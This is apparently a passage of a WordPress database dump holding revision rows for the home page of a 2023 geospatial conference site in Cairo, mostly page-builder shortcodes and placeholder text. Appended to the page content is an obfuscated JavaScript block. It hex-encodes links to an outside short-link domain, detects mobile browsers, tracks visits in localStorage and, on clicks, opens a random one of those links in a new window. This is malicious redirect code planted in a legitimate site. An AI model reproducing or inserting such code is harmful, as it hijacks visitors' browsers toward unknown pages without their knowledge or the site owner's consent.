)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:44:53','2022-11-09 15:44:53','',3066,'https://gsw2023.com/?p=3146',0,'revision','',0),
(3147,1,'2022-11-09 15:48:01','2022-11-09 15:48:01','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h3>EGYPT GSW\'2023</h3>\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668008877776{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:48:01','2022-11-09 15:48:01','',3066,'https://gsw2023.com/?p=3147',0,'revision','',0),
(3148,1,'2022-11-09 15:50:42','2022-11-09 15:50:42','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668009039309{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 